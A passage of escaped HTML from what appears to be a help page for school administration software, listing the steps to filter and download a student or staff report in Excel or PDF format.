The report is downloadable in Excel and PDF format from the page.<\/span><\/p>\n<ol>\n<li><span style=\"font-weight: 400;\">Select <\/span><b>Student<\/b><span style=\"font-weight: 400;\"> or <\/span><b>Staff<\/b><span style=\"font-weight: 400;\"> tab on the top of the page.<\/span><\/li>\n<li><span style=\"font-weight: 400;\">Click <\/span><b>FILTERS<\/b><span style=\"font-weight: 400;\"> on the left side of the page.<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Select <\/span><b>Class<\/b><span style=\"font-weight: 400;\"> and <\/span><b>Section<\/b><span style=\"font-weight: 400;\"> for the student and <\/span><b>Department<\/b><span style=\"font-weight: 400;\"> for the staff from the drop-down menu.<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Select checkcircle against <\/span><b>Date<\/b><span style=\"font-weight: 400;\"> or <\/span><b>Month<\/b><span style=\"font-weight: 400;\">.<\/span><span style=\"font-weight: 400;\"><br \/>\n<\/span><span style=\"font-weight: 400;\">If date is selected then select <\/span><b>From<\/b><span style=\"font-weight: 400;\"> and <\/span><b>To<\/b><span style=\"font-weight: 400;\"> dates.<\/span><span style=\"font-weight: 400;\"><br \/>\n<\/span><span style=\"font-weight: 400;\">If month is selected then select <\/span><b>Month <\/b><span style=\"font-weight: 400;\">from the drop-down menu.<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Turn on the toggle against <\/span><b>Include Inactive Student<\/b><span style=\"font-weight: 400;\"> or <\/span><b>Include Inactive Staff <\/b><span style=\"font-weight: 400;\">in their respective tabs if you want to download a report with inactive students and staff<\/span><b>.<\/b><\/li>\n<li><span style=\"font-weight: 400;\">Click <\/span><b>Submit<\/b><span style=\"font-weight: 400;\">.
